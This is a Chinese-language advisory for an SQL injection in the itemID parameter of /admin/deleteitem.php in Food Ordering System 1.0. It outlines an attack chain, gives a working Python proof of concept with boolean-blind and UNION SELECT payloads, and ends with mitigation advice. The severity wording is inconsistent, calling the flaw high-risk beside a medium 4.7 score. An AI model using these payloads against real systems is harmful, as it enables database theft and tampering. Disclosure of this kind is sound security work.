CVE-2025-12314 Food Ordering System 1.0 /admin/deleteitem.php SQL注入漏洞

漏洞信息

漏洞编号

CVE-2025-12314

漏洞类型

SQL注入

CVSS评分

4.7 中危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

无需交互 (UI:N)

影响产品

code-projects Food Ordering System 1.0

漏洞概述

CVE-2025-12314是code-projects平台开发的Food Ordering System 1.0版本中存在的一个高危SQL注入漏洞。该漏洞位于管理后台的删除商品功能文件中，具体为/admin/deleteitem.php文件。攻击者可以通过操纵itemID参数实现SQL注入攻击，成功利用此漏洞可能导致未授权访问数据库、窃取敏感用户信息（包括用户名、密码、订单数据等）、修改数据库内容甚至在某些情况下实现远程代码执行。由于该漏洞的利用代码已被公开，且CVSS评分达到4.7，属于中等严重程度，强烈建议受影响用户立即采取修复措施。该系统主要用于餐饮行业的在线订餐管理，漏洞若被利用可能对餐饮企业的业务数据和用户隐私造成严重威胁。

技术细节

该SQL注入漏洞源于/admin/deleteitem.php文件对用户输入的itemID参数缺乏有效的输入验证和参数化查询处理。攻击者可通过HTTP请求构造恶意的SQL语句片段，当应用程序将该输入直接拼接到SQL查询中时，攻击者的恶意代码将被数据库服务器执行。具体而言，攻击者可以利用UNION SELECT、布尔盲注、时间盲注等技术从数据库中提取敏感信息。由于该漏洞需要高权限认证（PR:H），攻击者需要先获取管理员账户或通过其他方式获得管理后台访问权限。漏洞的CVSS向量显示攻击复杂度较低（AC:L），但需要高权限认证，这限制了漏洞的利用范围，但仍对企业安全构成实质威胁。建议开发者使用参数化查询或预编译语句来修复此漏洞，并对所有用户输入进行严格的输入验证和过滤。

攻击链分析

STEP 1

1

侦察阶段：攻击者扫描目标系统，识别Food Ordering System 1.0并确认/admin/deleteitem.php端点存在

STEP 2

2

获取访问权限：攻击者通过暴力破解、钓鱼或其他方式获取管理员账户凭证

STEP 3

3

漏洞探测：使用SQL注入测试payload（如' OR '1'='1）验证itemID参数是否存在SQL注入漏洞

STEP 4

4

数据提取：利用UNION SELECT或盲注技术从数据库中提取敏感信息，包括用户表、管理员账户等

STEP 5

5

持久化控制：在某些情况下，攻击者可能通过写入恶意数据或创建后门账户实现持久化控制

STEP 6

6

横向移动：利用获取的数据库凭据尝试访问其他相关系统或进行进一步攻击

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

import requests
import sys

# CVE-2025-12314 SQL Injection PoC
# Target: Food Ordering System 1.0
# Location: /admin/deleteitem.php

def exploit_sql_injection(target_url, item_id):
    """
    SQL Injection PoC for CVE-2025-12314
    Tests for boolean-based blind SQL injection in itemID parameter
    """
    # Malicious payload testing for SQL injection
    # True condition - should execute successfully
    true_payload = f"{item_id}' AND 1=1 --"
    # False condition - should fail or behave differently
    false_payload = f"{item_id}' AND 1=2 --"
    
    headers = {
        'User-Agent': 'Mozilla/5.0 (Windows NT 10.0; Win64; x64)',
        'Cookie': 'PHPSESSID=admin_session_id'  # Requires admin auth
    }
    
    print(f"[*] Testing SQL Injection on {target_url}")
    
    # Test true condition
    true_url = f"{target_url}/admin/deleteitem.php?itemID={true_payload}"
    resp_true = requests.get(true_url, headers=headers, timeout=10)
    
    # Test false condition
    false_url = f"{target_url}/admin/deleteitem.php?itemID={false_payload}"
    resp_false = requests.get(false_url, headers=headers, timeout=10)
    
    # If responses differ, vulnerability exists
    if resp_true.status_code != resp_false.status_code or len(resp_true.text) != len(resp_false.text):
        print("[+] SQL Injection vulnerability confirmed!")
        print(f"[+] True payload response length: {len(resp_true.text)}")
        print(f"[+] False payload response length: {len(resp_false.text)}")
        return True
    else:
        print("[-] Vulnerability not detected or requires valid session")
        return False

def extract_data(target_url):
    """
    Data extraction using UNION-based SQL injection
    """
    # UNION-based injection to extract database info
    union_payload = "1' UNION SELECT 1,2,3,4,5,version(),user(),database() --"
    extract_url = f"{target_url}/admin/deleteitem.php?itemID={union_payload}"
    
    headers = {
        'User-Agent': 'Mozilla/5.0',
        'Cookie': 'PHPSESSID=admin_session_id'
    }
    
    print(f"[*] Attempting data extraction...")
    try:
        resp = requests.get(extract_url, headers=headers, timeout=10)
        # Parse response for extracted data
        if resp.status_code == 200:
            print("[+] Data extraction request sent")
            print(f"[+] Response: {resp.text[:500]}")
    except Exception as e:
        print(f"[-] Error: {e}")

if __name__ == '__main__':
    if len(sys.argv) < 2:
        print("Usage: python cve-2025-12314.py <target_url>")
        print("Example: python cve-2025-12314.py http://localhost/food-ordering")
        sys.exit(1)
    
    target = sys.argv[1].rstrip('/')
    exploit_sql_injection(target, "1")

影响范围

code-projects Food Ordering System 1.0

防御指南

临时缓解措施

立即限制/admin/deleteitem.php的访问权限，仅允许受信任的管理员IP访问。同时，可以临时在该文件开头添加输入过滤逻辑，对itemID参数进行正则验证（如仅允许数字），以阻止恶意SQL语句的注入。长期解决方案是使用参数化查询重构整个应用程序的数据库交互代码，并进行全面的安全审计。

参考链接

1 CVE https://www.cve.org/CVERecord?id=CVE-2025-12314
2 NVD https://nvd.nist.gov/vuln/detail/CVE-2025-12314
3 Details https://www.cvedetails.com/cve/CVE-2025-12314/
4 VulDB https://vuldb.com/cve/CVE-2025-12314
5 Link https://code-projects.org/
6 Link https://github.com/kaka00666/food-ordering-cve/issues/1
7 Link https://vuldb.com/?ctiid.329986
8 Link https://vuldb.com/?id.329986
9 Link https://vuldb.com/?submit.677029